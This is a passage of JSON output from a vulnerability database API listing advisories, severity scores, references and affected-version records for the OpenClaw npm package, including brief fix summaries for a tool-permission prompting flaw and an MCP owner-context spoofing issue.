                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T17:56:23Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mj59-h3q9-ghfh"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44995",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44995"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-mcp-stdio-environment-variables",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T17:56:23Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-mcp-stdio-environment-variables"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-mj59-h3q9-ghfh",
                    "reference_id": "GHSA-mj59-h3q9-ghfh",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-mj59-h3q9-ghfh"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.20",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"
                }
            ],
            "aliases": [
                "CVE-2026-44995",
                "GHSA-mj59-h3q9-ghfh"
            ],
            "risk_score": 3.3,
            "exploitability": "0.5",
            "weighted_severity": "6.6",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rr6t-1193-ybgz"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91642?format=api",
            "vulnerability_id": "VCID-rswr-nd6z-vuhe",
            "summary": "OpenClaw's Conflicting Tool Identity Hints Bypass Dangerous-Tool Prompting\n## Summary\nACP permission resolution trusted conflicting tool identity hints from rawInput and metadata, which could suppress dangerous-tool prompting.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `e4c61723cd2d530680cc61789311d464ab8cdf60`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- `src/acp/client.ts` now fails closed when meta, rawInput, and title tool identities conflict instead of trusting spoofable raw input.\n- `src/acp/client.test.ts` ships regression tests for conflicting tool identity hints and dangerous-tool prompting.\n\nOpenClaw thanks @zpbrent for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35655",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00046",
                            "scoring_system": "epss",
                            "scoring_elements": "0.14671",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00046",
                            "scoring_system": "epss",
                            "scoring_elements": "0.14635",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00046",
                            "scoring_system": "epss",
                            "scoring_elements": "0.14677",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35655"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:16Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/e4c61723cd2d530680cc61789311d464ab8cdf60",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:16Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/e4c61723cd2d530680cc61789311d464ab8cdf60"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-74wf-h43j-vvmj",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:16Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-74wf-h43j-vvmj"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35655",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35655"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-identity-spoofing-via-rawinput-tool-in-acp-permission-resolution",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:16Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-identity-spoofing-via-rawinput-tool-in-acp-permission-resolution"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-74wf-h43j-vvmj",
                    "reference_id": "GHSA-74wf-h43j-vvmj",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-74wf-h43j-vvmj"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35655",
                "GHSA-74wf-h43j-vvmj"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rswr-nd6z-vuhe"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91952?format=api",
            "vulnerability_id": "VCID-ry1r-br3q-2uaw",
            "summary": "OpenClaw: MCP loopback owner context is derived from server-issued bearer tokens\n## Summary\nBefore the fix, MCP loopback owner context was taken from spoofable request-header metadata; it is now derived from server-issued bearer tokens.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nThe loopback MCP path accepted spoofable owner-context metadata from request headers, which could allow a non-owner loopback client to present itself as owner for owner-gated operations.\n\n## Fix\nThe MCP loopback runtime now issues separate owner and non-owner bearer tokens and derives senderIsOwner exclusively from which token authenticated the request. The spoofable sender-owner header is no longer emitted or trusted.\n\n## Fix Commit(s)\n- 3cb1a56bfc9579a0f2336f9cfa12a8a744332a19\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @VladimirEliTokarev for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44118",
                    "reference_id": "",
